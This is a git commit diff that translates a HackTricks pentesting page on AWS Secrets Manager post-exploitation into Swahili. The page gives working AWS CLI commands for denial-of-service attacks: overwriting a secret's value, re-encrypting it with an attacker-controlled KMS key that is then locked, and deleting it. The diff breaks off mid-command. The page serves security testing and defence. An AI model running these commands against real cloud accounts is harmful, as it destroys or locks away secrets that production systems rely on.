Translated ['', 'src/pentesting-cloud/aws-security/aws-post-exploitation

This commit is contained in:
Translator
2025-10-01 10:29:04 +00:00
parent 47b26dfc88
commit de769a29e7
@@ -1,8 +1,8 @@
# AWS - Usimamizi wa Siri Baada ya Kutekeleza
# AWS - Secrets Manager Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Usimamizi wa Siri
## Secrets Manager
Kwa maelezo zaidi angalia:
@@ -10,31 +10,37 @@ Kwa maelezo zaidi angalia:
../aws-services/aws-secrets-manager-enum.md
{{#endref}}
### Soma Siri
### Read Secrets
**siri zenyewe ni taarifa nyeti**, [angalia ukurasa wa privesc](../aws-privilege-escalation/aws-secrets-manager-privesc.md) kujifunza jinsi ya kuzisoma.
**secrets wenyewe ni taarifa nyeti**, [angalia ukurasa wa privesc](../aws-privilege-escalation/aws-secrets-manager-privesc.md) ili ujifunze jinsi ya kuvisoma.
### Badilisha Thamani ya Siri kwa DoS
### DoS Change Secret Value
Kubadilisha thamani ya siri unaweza **DoS mfumo wote unaotegemea thamani hiyo.**
Kubadilisha thamani ya secret kunaweza **kusababisha DoS kwa mifumo yote inayotegemea thamani hiyo.**
> [!WARNING]
> Kumbuka kwamba thamani za awali pia zimehifadhiwa, hivyo ni rahisi kurudi kwenye thamani ya awali.
> Kumbuka kwamba thamani za awali pia zinahifadhiwa, hivyo ni rahisi kurudi kwenye thamani ya awali.
```bash
# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
```
### DoS Badilisha funguo la KMS
### DoS Change KMS key
Kama mshambuliaji ana ruhusa secretsmanager:UpdateSecret, anaweza kusanidi secret itumie KMS key inayomilikiwa na mshambuliaji. KMS key hiyo imewekwa awali kwa njia ambayo yeyote anaweza kuifikia na kuitumia, hivyo kusasisha secret kwa key mpya kunawezekana. Ikiwa key haikuweza kupatikana, secret haiwezi kusasishwa.
Baada ya kubadilisha key ya secret, mshambuliaji anabadilisha usanidi wa KMS key yao ili yeye pekee aweze kuifikia. Kwa hivyo, katika matoleo yajayo ya secret, zitawekwa kwa encryption kwa KMS key mpya, na kwa kuwa hakuna ufikikaji wa key hiyo, uwezo wa kupata secret utapotea.
Ni muhimu kutambua kuwa ukosefu huu wa ufikikaji utatokea tu katika matoleo ya baadaye, baada ya maudhui ya secret kubadilika, kwani toleo la sasa bado limeencrypted na KMS key ya asili.
```bash
aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
```
### DoS Kuondoa Siri
### DoS Kufuta Siri
Idadi ya chini ya siku za kuondoa siri ni 7
Idadi ya chini ya siku za kufuta siri ni 7.
```bash
aws secretsmanager delete-secret \
--secret-id MyTestSecret \